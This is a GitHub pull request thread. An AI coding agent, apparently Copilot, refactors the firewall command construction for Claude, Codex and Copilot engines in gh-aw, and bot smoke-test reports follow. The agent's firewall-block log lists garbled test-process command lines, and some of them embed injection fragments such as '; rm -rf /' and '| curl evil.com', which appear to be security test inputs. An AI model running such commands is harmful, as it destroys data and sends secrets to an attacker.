Consolidate AWF command building logic across all agentic engines

[Copilot]

AWF (Agentic Workflow Firewall) command construction was duplicated across Claude, Codex, and Copilot engines with ~110-130 lines of identical logic per engine. This consolidates the logic into reusable helpers.

Changes

New module: pkg/workflow/awf_helpers.go

• BuildAWFCommand() - Constructs complete AWF-wrapped command from configuration
• BuildAWFArgs() - Assembles AWF arguments (mounts, domains, image tag, API proxy, SSL bump)
• GetAWFCommandPrefix() - Resolves custom vs. standard AWF command
• WrapCommandInShell() - Shell escapes and wraps engine command
• AWFCommandConfig - Type-safe configuration struct

Constants extraction: pkg/constants/constants.go

// Environment variables
EnvVarPrompt = "GH_AW_PROMPT"
EnvVarMCPConfig = "GH_AW_MCP_CONFIG"
EnvVarSafeOutputs = "GH_AW_SAFE_OUTPUTS"
EnvVarMaxTurns = "GH_AW_MAX_TURNS"
EnvVarStartupTimeout = "GH_AW_STARTUP_TIMEOUT"
EnvVarToolTimeout = "GH_AW_TOOL_TIMEOUT"
EnvVarGitHubToken = "GH_AW_GITHUB_TOKEN"

// AWF configuration
AWFDefaultCommand = "sudo -E awf"
AWFProxyLogsDir = "/tmp/gh-aw/sandbox/firewall/logs"
AWFDefaultLogLevel = "info"

Engine refactoring

Before (per engine):

// ~110-130 lines of AWF argument building, command wrapping, and formatting
firewallConfig := getFirewallConfig(workflowData)
awfArgs := []string{"--tty", "--env-all", ...}
// ... mount sorting, domain formatting, SSL bump, etc.
awfCommand := "sudo -E awf"
shellWrappedCommand := fmt.Sprintf("/bin/bash -c '%s'", escapedCommand)
command = fmt.Sprintf(`set -o pipefail\n%s %s -- %s 2>&1 | tee -a %s`, ...)

After:

// ~25-40 lines
allowedDomains := Get{Engine}AllowedDomainsWithToolsAndRuntimes(...)
command = BuildAWFCommand(AWFCommandConfig{
    EngineName:     "claude",
    EngineCommand:  claudeCommandWithPath,
    WorkflowData:   workflowData,
    UsesTTY:        true,
    UsesAPIProxy:   e.SupportsLLMGateway() > 0,
    AllowedDomains: allowedDomains,
    PathSetup:      promptSetup,
})

Impact

• Claude engine: -100 lines
• Codex engine: -90 lines
• Copilot engine: -85 lines
• Net: +276 new, -275 removed = +1 line total
• Single source of truth for AWF command building
• Consistent tee flags, log escaping, and constant usage
• 113 workflow .lock.yml files recompiled

Original prompt

Review agentic engine interface, and implementation of all custom agents.

• Refactor common code
• Extract constants
• make it general and extensible
• refactor AWF logic in helper

---

💡 You can make Copilot smarter by setting up custom instructions, customizing its development environment and configuring Model Context Protocol (MCP) servers. Learn more Copilot coding agent tips in the docs.

---

Changeset

• Type: patch
• Description: Consolidate AWF command construction and AWF constants so Claude, Codex, and Copilot reuse the same helpers

Generated by Changeset Generator

[pelikhan]

@copilot recompile

[pelikhan]

@copilot keep working

[Copilot]

@copilot keep working

Completed the refactoring! All three main engines (Claude, Codex, and Copilot) now use the consolidated AWF helper functions.

Latest commits:

• da6894f - Refactored Copilot engine (-85 lines)
• 59e5d25 - Recompiled 103 workflows with new Copilot code

Total impact:

• ~275 lines of duplicated AWF code eliminated
• All engine tests pass (Claude: 34/34, Codex: 14/14, Copilot: 22/22)
• 113 workflows successfully recompiled

Warning

Firewall rules blocked me from connecting to one or more addresses (expand for details)

I tried to connect to the following addresses, but was blocked by firewall rules:

• https://api.github.com/graphql
  • Triggering command: /usr/bin/gh /usr/bin/gh api graphql -f query=query($owner: String!, $name: String!) { repository(owner: $owner, name: $name) { hasDiscussionsEnabled } } -f owner=github -f name=gh-aw (http block)
  • Triggering command: /usr/bin/gh /usr/bin/gh api graphql -f query=query($owner: String!, $name: String!) { repository(owner: $owner, name: $name) { hasDiscussionsEnabled } } -f owner=github -f name=gh-aw flow (http block)
  • Triggering command: /usr/bin/gh gh repo view --json owner,name --jq .owner.login + "/" + .name x_amd64/compile GOINSECURE GOMOD GOMODCACHE x_amd64/compile env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
• https://api.github.com/repos/actions/ai-inference/git/ref/tags/v1
  • Triggering command: /usr/bin/gh gh api /repos/actions/ai-inference/git/ref/tags/v1 --jq .object.sha -json GO111MODULE ache/node/24.13.0/x64/bin/node GOINSECURE GOMOD GOMODCACHE git t-22�� sistency_GoAndJavaScript3416616137/001/test-simple-frontmatter.md GOPROXY /usr/bin/gh GOSUMDB GOWORK 64/bin/go gh (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/ai-inference/git/ref/tags/v1 --jq .object.sha feature; rm -rf / st/dist/workers/--quiet /home/REDACTED/.config/composer/vendor/bin/git (http block)
• https://api.github.com/repos/actions/ai-inference/git/ref/tags/v2
  • Triggering command: /usr/bin/gh gh api /repos/actions/ai-inference/git/ref/tags/v2 --jq .object.sha ../pkg/workflow/js/**/*.json' --ignore-path ../../../.prettierignore .cfg 64/pkg/tool/linux_amd64/vet (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/ai-inference/git/ref/tags/v2 --jq .object.sha ../pkg/workflow/js/**/*.json' --ignore-path ../../../.prettierignore .cfg r: $owner, name: $name) { hasDiscussionsEnabled } } (http block)
• https://api.github.com/repos/actions/checkout/git/ref/tags/11bd71901bbe5b1630ceea73d27597364c9af683
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/11bd71901bbe5b1630ceea73d27597364c9af683 --jq .object.sha ../pkg/workflow/js/**/*.json' --ignore-path ../../../.prettierignore .cfg 64/pkg/tool/linux_amd64/vet (http block)
• https://api.github.com/repos/actions/checkout/git/ref/tags/v3
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v3 --jq .object.sha 9299/001/stability-test.md GO111MODULE .cfg GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet GOINSECURE GOMOD GOMODCACHE ache/go/1.25.0/x64/pkg/tool/linuorigin (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v3 --jq .object.sha test-CZGdlN/test-cwd.go --quiet ache/go/1.25.0/x64/bin/git tch ache/go/1.25.0/xrev-parse /usr/bin/git git rev-�� 2643-38513/test-1724719848/.github/workflows forks.js .cfg --show-toplevel go run-script/lib/n--show-toplevel /opt/hostedtoolcache/node/24.13.0/x64/bin/node (http block)
• https://api.github.com/repos/actions/checkout/git/ref/tags/v4
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v4 --jq .object.sha -json GO111MODULE (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v4 --jq .object.sha ipts.test GO111MODULE ortcfg.link GOINSECURE GOMOD GOMODCACHE 7YNdb_hCYotEi1LiCN/2MKeL86BOM2siFyPOPt7/hAqieucyA4npJ9bo6g4b env runs/20260215-012420-31997/test-596193494 GO111MODULE g_.a GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v4 --jq .object.sha run --auto /usr/bin/git --detach GO111MODULE 64/bin/go git init�� GOMODCACHE node /usr/bin/git --check **/*.cjs 64/bin/go git (http block)
• https://api.github.com/repos/actions/checkout/git/ref/tags/v5
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v5 --jq .object.sha -json GO111MODULE x_amd64/link GOINSECURE GOMOD GOMODCACHE x_amd64/link env -json GO111MODULE 64/pkg/tool/linux_amd64/link GOINSECURE GOMOD GOMODCACHE Vz/uBptpbGGQWepCconfig (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v5 --jq .object.sha 6067687/b417/_pkg_.a -buildtags 6067687/b417=> -errorsas b/gh-aw/pkg/timerev-parse -nilfunc git -C bW5I/-pOH6J5YoELjpq_JbW5I config /usr/bin/git remote.origin.urgit GO111MODULE 64/bin/go 6067687/b417/importcfg (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v5 --jq .object.sha --show-toplevel 4404561/b374/imp-goversion /usr/bin/git 4404561/b374/embgit GOPROXY 64/bin/go git init�� 64/bin/go /opt/hostedtoolc/home/REDACTED/work/gh-aw/gh-aw/pkg/cli/fileutil/fileutil_test.go /usr/bin/git /tmp/go-build178git -trimpath 64/bin/go git (http block)
• https://api.github.com/repos/actions/checkout/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v6 --jq .object.sha (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v6 --jq .object.sha get a168b867e0e1309c83fc6908:go.mod ules/.bin/sh credential.userngit (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/checkout/git/ref/tags/v6 --jq .object.sha cp .github/aw/acremote.origin.url --local ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet credential.usern/usr/bin/gh (http block)
• https://api.github.com/repos/actions/download-artifact/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/actions/download-artifact/git/ref/tags/v6 --jq .object.sha (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/download-artifact/git/ref/tags/v6 --jq .object.sha .js' --ignore-path .prettierignore 8489834/b084/vet.cfg 0/x64/bin/git (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/download-artifact/git/ref/tags/v6 --jq .object.sha se 8489834/b094/vet.cfg ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet (http block)
• https://api.github.com/repos/actions/github-script/git/ref/tags/v7
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v7 --jq .object.sha (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v7 --jq .object.sha get --local h credential.userngit (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v7 --jq .object.sha '**/*.ts' '**/*.json' --ignore-path ../../../.pr**/*.json --local r: $owner, name: $name) { hasDiscussionsEnabled } } user.email rd/go-difflib/diapi (http block)
• https://api.github.com/repos/actions/github-script/git/ref/tags/v8
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v8 --jq .object.sha heck '**/*.cjs' GOINSECURE GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v8 --jq .object.sha -c=4 -nolocalimports -importcfg /tmp/go-build1686067687/b385/importcfg -pack /home/REDACTED/work/gh-aw/gh-aw/pkg/fileutil/fileutil.go /home/REDACTED/work/gh-aw/gh-aw/pkg/fileutil/fileutil_test.go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/github-script/git/ref/tags/v8 --jq .object.sha -json GO111MODULE 64/bin/go GOINSECURE GOMOD ode-gyp-bin/node-json go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
• https://api.github.com/repos/actions/setup-go/git/ref/tags/4dc6199c7b1a012772edbd06daecab0f50c9053c
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/4dc6199c7b1a012772edbd06daecab0f50c9053c --jq .object.sha '**/*.ts' '**/*.remote.origin.url --local 0/x64/bin/npm user.email (http block)
• https://api.github.com/repos/actions/setup-go/git/ref/tags/v4
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v4 --jq .object.sha SameOutput2752349299/001/stability-test.md GO111MODULE .cfg GOINSECURE GOMOD GOMODCACHE go env runs/20260215-012420-31997/test-363161464 GO111MODULE /opt/hostedtoolcache/go/1.25.0/x64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v4 --jq .object.sha /tmp/go-handler-test-9U5ZCB/slow.go git /home/REDACTED/work/_temp/ghcca-node/node/bin/git -m Update initial frev-parse /usr/bin/git git inva�� runs/20260215-012643-38513/test-725535893/.github/workflows forks.js ache/node/24.13.0/x64/bin/node l git /usr/bin/git git (http block)
• https://api.github.com/repos/actions/setup-go/git/ref/tags/v5
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v5 --jq .object.sha on' --ignore-path ../../../.prettierignore .cfg $name) { hasDiscussionsEnabled } } (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v5 --jq .object.sha on' --ignore-path ../../../.prettierignore .cfg ode_modules/.bin/sh (http block)
• https://api.github.com/repos/actions/setup-go/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v6 --jq .object.sha (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v6 --jq .object.sha h ../../../.prettierignore (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-go/git/ref/tags/v6 --jq .object.sha js/**/*.json' --ignore-path ../../../.prettierignore (http block)
• https://api.github.com/repos/actions/setup-node/git/ref/tags/v4
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-node/git/ref/tags/v4 --jq .object.sha -json GO111MODULE 0/x64/bin/node GOINSECURE GOMOD GOMODCACHE go t-ha�� ring854262525/001/test2.md GO111MODULE /opt/hostedtoolcache/go/1.25.0/x64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-node/git/ref/tags/v4 --jq .object.sha /tmp/go-handler-test-9U5ZCB/slow.go /usr/lib/git-core/git /opt/hostedtoolcache/go/1.25.0/x64/bin/git run --auto ndor/bin/sh git inva�� ings.cjs forks.js /snap/bin/git --show-toplevel git modules/@npmcli/--show-toplevel git (http block)
• https://api.github.com/repos/actions/setup-node/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-node/git/ref/tags/v6 --jq .object.sha (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-node/git/ref/tags/v6 --jq .object.sha h ../../../.prettierignore (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/setup-node/git/ref/tags/v6 --jq .object.sha js/**/*.json' --ignore-path ../../../.prettierignore (http block)
• https://api.github.com/repos/actions/upload-artifact/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/actions/upload-artifact/git/ref/tags/v6 --jq .object.sha h ../../../.prettierignore (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/upload-artifact/git/ref/tags/v6 --jq .object.sha h ../../../.pret.prettierignore (http block)
  • Triggering command: /usr/bin/gh gh api /repos/actions/upload-artifact/git/ref/tags/v6 --jq .object.sha -c=4 -nolocalimports -importcfg /tmp/go-build566585077/b001/importcfg -pack /home/REDACTED/work/gh-aw/gh-aw/cmd/gh-aw/main.go x_amd64/vet (http block)
• https://api.github.com/repos/anchore/sbom-action/git/ref/tags/v0
  • Triggering command: /usr/bin/gh gh api /repos/anchore/sbom-action/git/ref/tags/v0 --jq .object.sha get --local ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/anchore/sbom-action/git/ref/tags/v0 --jq .object.sha get --local r: $owner, name: $name) { hasDiscussionsEnabled } } user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/anchore/sbom-action/git/ref/tags/v0 --jq .object.sha '**/*.ts' '**/*.json' --ignore-path ../../../.pr**/*.json --local r: $owner, name: $name) { hasDiscussionsEnabled } } user.email UC/Dcues-uXG8kCxapi (http block)
• https://api.github.com/repos/docker/build-push-action/git/ref/tags/v6
  • Triggering command: /usr/bin/gh gh api /repos/docker/build-push-action/git/ref/tags/v6 --jq .object.sha get --local r: $owner, name: $name) { hasDiscussionsEnabled } } credential.usern/usr/bin/gh (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/build-push-action/git/ref/tags/v6 --jq .object.sha '**/*.ts' '**/*.remote.origin.url --local $name) { hasDiscussionsEnabled } } user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/build-push-action/git/ref/tags/v6 --jq .object.sha '**/*.ts' '**/*.json' --ignore-path ../../../.pr**/*.json --local .cfg user.email (http block)
• https://api.github.com/repos/docker/login-action/git/ref/tags/v3
  • Triggering command: /usr/bin/gh gh api /repos/docker/login-action/git/ref/tags/v3 --jq .object.sha get --local .cfg user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/login-action/git/ref/tags/v3 --jq .object.sha '**/*.ts' '**/*.json' --ignore-path ../../../.pr**/*.json --local .cfg user.email (http block)
• https://api.github.com/repos/docker/metadata-action/git/ref/tags/v5
  • Triggering command: /usr/bin/gh gh api /repos/docker/metadata-action/git/ref/tags/v5 --jq .object.sha get --local r: $owner, name: $name) { hasDiscussionsEnabled } } user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/metadata-action/git/ref/tags/v5 --jq .object.sha '**/*.ts' '**/*.remote.origin.url --local 0/x64/bin/node user.email b/gh-aw/pkg/test-C (http block)
• https://api.github.com/repos/docker/setup-buildx-action/git/ref/tags/v3
  • Triggering command: /usr/bin/gh gh api /repos/docker/setup-buildx-action/git/ref/tags/v3 --jq .object.sha cli/install.sh..." --local ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet credential.userngit b/gh-aw/pkg/cli (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/setup-buildx-action/git/ref/tags/v3 --jq .object.sha files..." --local ache/go/1.25.0/x64/pkg/tool/linux_amd64/vet user.name (http block)
  • Triggering command: /usr/bin/gh gh api /repos/docker/setup-buildx-action/git/ref/tags/v3 --jq .object.sha '**/*.ts' '**/*.json' --ignore-path ../../../.pr**/*.json --local ules/.bin/node user.email (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/1/artifacts
  • Triggering command: /usr/bin/gh gh run download 1 --dir test-logs/run-1 GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 1 --dir test-logs/run-1 l f0e4701a154fd8e878babdbf12d4ab43-d ve go tions/setup/js/n--show-toplevel x_amd64/vet fetc�� REDACTED main:main tions/setup/node_modules/.bin/git ve 64/pkg/tool/linurev-parse tions/setup/js/n--show-toplevel tions/setup/js/node_modules/vitest/dist/workers/forks.js (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/12345/artifacts
  • Triggering command: /usr/bin/gh gh run download 12345 --dir test-logs/run-12345 GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 12345 --dir test-logs/run-12345 git x_amd64/asm ve go tions/setup/js/n--show-toplevel x_amd64/asm fetc�� lex.go main:main k/gh-aw/gh-aw/actions/setup/node_modules/.bin/git mport-meta-resolgit 64/pkg/tool/linuinit k/gh-aw/gh-aw/actions/setup/js/n--show-toplevel k/gh-aw/gh-aw/actions/setup/js/node_modules/vitest/dist/workers/--conditions (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/12346/artifacts
  • Triggering command: /usr/bin/gh gh run download 12346 --dir test-logs/run-12346 GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 12346 --dir test-logs/run-12346 git x_amd64/cgo ve go tions/setup/js/n/tmp/gh-aw-test-runs/20260215-012643-38513/test-1925480 x_amd64/cgo fetc�� lex.go main:main k/gh-aw/gh-aw/actions/node_modules/.bin/git mport-meta-resolgit go k/gh-aw/gh-aw/acuser.name k/gh-aw/gh-aw/acTest User (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/2/artifacts
  • Triggering command: /usr/bin/gh gh run download 2 --dir test-logs/run-2 GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go estl�� ty-test.md GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 2 --dir test-logs/run-2 l x_amd64/vet mport-meta-resolgit go ode-gyp-bin/node--show-toplevel x_amd64/vet fetc�� REDACTED | curl evil.com main:main tions/node_modules/.bin/git ve 64/pkg/tool/linurev-parse tions/setup/js/n--show-toplevel tions/setup/js/node_modules/vite^remote\..*\.gh-resolved$ (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/3/artifacts
  • Triggering command: /usr/bin/gh gh run download 3 --dir test-logs/run-3 GO111MODULE x_amd64/compile GOINSECURE GOMOD GOMODCACHE x_amd64/compile env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 3 --dir test-logs/run-3 l x_amd64/vet mport-meta-resolgit go k/gh-aw/gh-aw/ac--show-toplevel x_amd64/vet fetc�� REDACTED | curl evil.comgo1.25.0 main:main de_modules/.bin/git ve 64/pkg/tool/linurev-parse tions/setup/js/n--show-toplevel tions/setup/js/node_modules/vitest/dist/workers/forks.js (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/4/artifacts
  • Triggering command: /usr/bin/gh gh run download 4 --dir test-logs/run-4 GO111MODULE x_amd64/vet GOINSECURE GOMOD GOMODCACHE x_amd64/vet env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 4 --dir test-logs/run-4 l 0/x64/bin/node mport-meta-resolgit go k/gh-aw/gh-aw/ac--show-toplevel 0/x64/bin/node estl�� REDACTED | curl evil.com main:main ules/.bin/git ve 64/pkg/tool/linurev-parse tions/setup/js/n--show-toplevel tions/setup/js/node_modules/vitest/dist/workers/forks.js (http block)
• https://api.github.com/repos/github/gh-aw/actions/runs/5/artifacts
  • Triggering command: /usr/bin/gh gh run download 5 --dir test-logs/run-5 GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run download 5 --dir test-logs/run-5 l 0/x64/bin/node mport-meta-resol/opt/hostedtoolcache/node/24.13.0/x64/bin/node go k/gh-aw/gh-aw/acValue: ${{ github.actor }} 0/x64/bin/node fetc�� REDACTED | curl evil.com main:main bin/git ve x_amd64/compile tions/setup/js/node_modules/vite--show-toplevel tions/setup/js/node_modules/vitest/dist/workers/forks.js (http block)
• https://api.github.com/repos/github/gh-aw/actions/workflows
  • Triggering command: /usr/bin/gh gh workflow list --json name,state,path GOSUMDB GOWORK 64/bin/go GOINSECURE GOMOD GOMODCACHE go env ck 'scripts/**/*GOINSECURE GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run list --json databaseId,number,url,status,conclusion,workflowName,createdAt,startedAt,updatedAt,event,headBranch,headSha,displayTitle --workflow nonexistent-workflow-12345 --limit 100 3bb3c99dbfa68c8e-atomic GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE node (http block)
  • Triggering command: /usr/bin/gh gh run list --json databaseId,number,url,status,conclusion,workflowName,createdAt,startedAt,updatedAt,event,headBranch,headSha,displayTitle --workflow nonexistent-workflow-12345 --limit 6 GOMOD GOMODCACHE go estl�� -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
• https://api.github.com/repos/github/gh-aw/contents/.github%2Fworkflows%2Faudit-workflows.md
  • Triggering command: /opt/hostedtoolcache/node/24.13.0/x64/bin/node /opt/hostedtoolcache/node/24.13.0/x64/bin/node --conditions node --conditions development --experimental-import-meta-resolve --require /home/REDACTED/work/gh-aw/gh-aw/actions/setup/js/node_modules/vitest/suppress-warnings.cjs /home/REDACTED/work/gh-aw/gh-aw/actions/setup/js/node_modules/vitest/dist/workers/forks.js g/cli/fileutil/fcommit ache/go/1.25.0/x-m git ode_�� --show-toplevel ache/go/1.25.0/x64/pkg/tool/linurev-parse /opt/hostedtoolcache/go/1.25.0/x64/bin/node 6067687/b371/_pk/opt/hostedtoolcache/node/24.13.0/x64/bin/node GO111MODULE 6067687/b371=> node (http block)
• https://api.github.com/repos/github/gh-aw/git/ref/tags/c4e091835c7a94dc7d3acb8ed3ae145afb4995f3
  • Triggering command: /usr/bin/gh gh api /repos/github/gh-aw/git/ref/tags/c4e091835c7a94dc7d3acb8ed3ae145afb4995f3 --jq .object.sha (http block)
• https://api.github.com/repos/github/gh-aw/git/ref/tags/v1.0.0
  • Triggering command: /usr/bin/gh gh api /repos/github/gh-aw/git/ref/tags/v1.0.0 --jq .object.sha ty-test.md GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/pkg/tool/linux_amd64/vet GOINSECURE GOMOD GOMODCACHE 64/pkg/tool/linuorigin (http block)
  • Triggering command: /usr/bin/gh gh api /repos/github/gh-aw/git/ref/tags/v1.0.0 --jq .object.sha featurewhoami l 0/x64/bin/node ve go tions/setup/js/n--git-dir 0/x64/bin/node estl�� REDACTED | curl evil.com main:main x_amd64/link ve 64/pkg/tool/linurev-parse tions/setup/js/n--show-toplevel x_amd64/link (http block)
• https://api.github.com/repos/githubnext/agentics/git/ref/tags/-
  • Triggering command: /usr/bin/gh gh api /repos/githubnext/agentics/git/ref/tags/- --jq .object.sha on' --ignore-path ../../../.prettierignore .cfg $name) { hasDiscussionsEnabled } } (http block)
• https://api.github.com/repos/nonexistent/repo/actions/runs/12345
  • Triggering command: /usr/bin/gh gh run view 12345 --repo nonexistent/repo --json status,conclusion GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh run view 12345 --repo nonexistent/repo --json status,conclusion --show-toplevel go (http block)
• https://api.github.com/repos/owner/repo/actions/workflows
  • Triggering command: /usr/bin/gh gh workflow list --json name,state,path --repo owner/repo 64/bin/go GOINSECURE GOMOD ode-gyp-bin/node-json go env ck 'scripts/**/*GOINSECURE GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh workflow list --json name,state,path --repo owner/repo 64/bin/go GOINSECURE GOMOD GOMODCACHE go env ck 'scripts/**/*GOINSECURE GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh workflow list --repo owner/repo --json name,path,state 64/bin/go GOINSECURE GOMOD GOMODCACHE go env -json GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
• https://api.github.com/repos/test-owner/test-repo/actions/secrets
  • Triggering command: /usr/bin/gh gh api /repos/test-owner/test-repo/actions/secrets --jq .secrets[].name GOSUMDB GOWORK 64/bin/go GOINSECURE GOMOD GOMODCACHE go env ck 'scripts/**/*GOINSECURE GO111MODULE 64/bin/go GOINSECURE GOMOD GOMODCACHE go (http block)
  • Triggering command: /usr/bin/gh gh api /repos/test-owner/test-repo/actions/secrets --jq .secrets[].name ; rm -rf / /tmp/go-build168--require /usr/bin/git -test.paniconexigit resolved$ (http block)
• https://api.github.com/user
  • Triggering command: /usr/bin/gh gh api user --jq .login ath ../../../.prettierignore (http block)
  • Triggering command: /usr/bin/gh gh api user --jq .login (http block)
  • Triggering command: /usr/bin/gh gh api user --jq .login GOSUMDB GOWORK 64/bin/go GOINSECURE GOMOD GOMODCACHE ortcfg env g/logger/doc.go g/logger/error_fGOMOD 64/bin/go GOINSECURE GOMOD GOMODCACHE ache/go/1.25.0/xGO111MODULE (http block)

If you need me to access, download, or install something from one of these locations, you can either:

• Configure Actions setup steps to set up my environment, which run before the firewall is enabled
• Add the appropriate URLs or hosts to the custom allowlist in this repository's Copilot coding agent settings (admins only)

[github-actions]

✨ The prophecy is fulfilled... Smoke Codex has completed its mystical journey. The stars align. 🌟

[github-actions]

📰 BREAKING: Smoke Copilot is now investigating this pull request. Sources say the story is developing...

[github-actions]

✅ Changeset Generator completed successfully!

[github-actions]

🧪 Smoke Temporary ID is now testing temporary ID functionality...

[github-actions]

🧪 Smoke Project is now testing project operations...

[github-actions]

❌ Smoke Copilot SDK failed. Please review the logs for details.

[github-actions]

🎬 THE END — Smoke Claude MISSION: ACCOMPLISHED! The hero saves the day! ✨

[github-actions]

Agent Container Tool Check ✅

Tool	Status	Version
bash	✅	5.2.21
sh	✅	available
git	✅	2.52.0
jq	✅	1.7
yq	✅	4.52.2
curl	✅	8.5.0
gh	✅	2.86.0
node	✅	20.20.0
python3	✅	3.12.3
go	✅	1.24.13
java	✅	21.0.10
dotnet	✅	10.0.102

Result: 12/12 tools available ✅

All common development tools are accessible in the agent container environment.

AI generated by Agent Container Smoke Test

[github-actions]

✅ Smoke Temporary ID completed successfully. Temporary ID validation passed.

[github-actions]

✅ Smoke Project completed successfully. All project operations validated.

[github-actions]

Merged PRs:

• Switch review workflows to submit_pull_request_review
• Fix awf logs command failure when binary not installed
  GitHub MCP: ✅
  Serena MCP (activate+find_symbol): ✅
  Playwright (title contains GitHub): ✅
  File write+cat: ✅
  Build (make build): ✅
  Overall: PASS

AI generated by Smoke Codex

[github-actions]

💥 Automated smoke test review - all systems nominal!

💥 [THE END] — Illustrated by Smoke Claude for issue #15810

[github-actions]

Smoke Test Results

PRs Reviewed:

• Fix runtime-import path extraction for .github.io repositories #15826: Fix incorrect runtime-import path for .github.io repos
• Consolidate AWF command building logic across all agentic engines #15810: Consolidate AWF command building logic

Test Results:

• ✅ GitHub MCP
• ✅ Safe Inputs GH CLI
• ✅ Playwright
